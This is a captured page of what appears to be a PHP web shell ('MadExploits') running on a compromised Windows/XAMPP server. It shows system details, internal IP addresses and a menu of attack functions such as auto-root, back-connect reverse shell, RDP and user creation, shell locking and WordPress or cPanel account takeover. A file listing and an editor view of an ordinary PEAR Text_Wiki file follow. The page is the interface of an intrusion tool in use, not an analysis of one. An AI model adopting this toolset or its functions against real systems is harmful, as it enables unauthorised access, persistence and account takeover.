Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
php /
pear /
Text /
Wiki /
Render /
Plain /
[ HOME SHELL ]
Name
Size
Permission
Action
Anchor.php
357
B
-rw-rw-rw-
Blockquote.php
907
B
-rw-rw-rw-
Bold.php
419
B
-rw-rw-rw-
Box.php
1.2
KB
-rw-rw-rw-
Break.php
426
B
-rw-rw-rw-
Center.php
421
B
-rw-rw-rw-
Code.php
461
B
-rw-rw-rw-
Colortext.php
428
B
-rw-rw-rw-
Deflist.php
1.09
KB
-rw-rw-rw-
Delimiter.php
428
B
-rw-rw-rw-
Embed.php
453
B
-rw-rw-rw-
Emphasis.php
427
B
-rw-rw-rw-
Font.php
1.29
KB
-rw-rw-rw-
Freelink.php
444
B
-rw-rw-rw-
Function.php
920
B
-rw-rw-rw-
Heading.php
241
B
-rw-rw-rw-
Horiz.php
429
B
-rw-rw-rw-
Html.php
457
B
-rw-rw-rw-
Image.php
419
B
-rw-rw-rw-
Include.php
130
B
-rw-rw-rw-
Interwiki.php
689
B
-rw-rw-rw-
Italic.php
425
B
-rw-rw-rw-
List.php
1.7
KB
-rw-rw-rw-
Newline.php
148
B
-rw-rw-rw-
Page.php
1.21
KB
-rw-rw-rw-
Paragraph.php
596
B
-rw-rw-rw-
Phplookup.php
501
B
-rw-rw-rw-
Plugin.php
1.3
KB
-rw-rw-rw-
Prefilter.php
754
B
-rw-rw-rw-
Preformatted.php
1.25
KB
-rw-rw-rw-
Raw.php
439
B
-rw-rw-rw-
Revise.php
430
B
-rw-rw-rw-
Smiley.php
1.26
KB
-rw-rw-rw-
Specialchar.php
1.61
KB
-rw-rw-rw-
Strong.php
430
B
-rw-rw-rw-
Subscript.php
1.22
KB
-rw-rw-rw-
Superscript.php
430
B
-rw-rw-rw-
Table.php
1.11
KB
-rw-rw-rw-
Tighten.php
136
B
-rw-rw-rw-
Titlebar.php
1.36
KB
-rw-rw-rw-
Toc.php
784
B
-rw-rw-rw-
Tt.php
426
B
-rw-rw-rw-
Underline.php
424
B
-rw-rw-rw-
Url.php
554
B
-rw-rw-rw-
Wikilink.php
425
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Prefilter.php
<?php // vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4: /** * This class implements a Text_Wiki_Render_Xhtml to "pre-filter" source text so * that line endings are consistently \n, lines ending in a backslash \ * are concatenated with the next line, and tabs are converted to spaces. * * PHP versions 4 and 5 * * @category Text * @package Text_Wiki * @author Paul M. Jones <pmjones@php.net> * @license http://www.gnu.org/copyleft/lesser.html LGPL License 2.1 * @version CVS: $Id: Prefilter.php 248435 2007-12-17 16:19:44Z justinpatrin $ * @link http://pear.php.net/package/Text_Wiki */ class Text_Wiki_Render_Plain_Prefilter extends Text_Wiki_Render { function token() { return ''; } } ?>
Close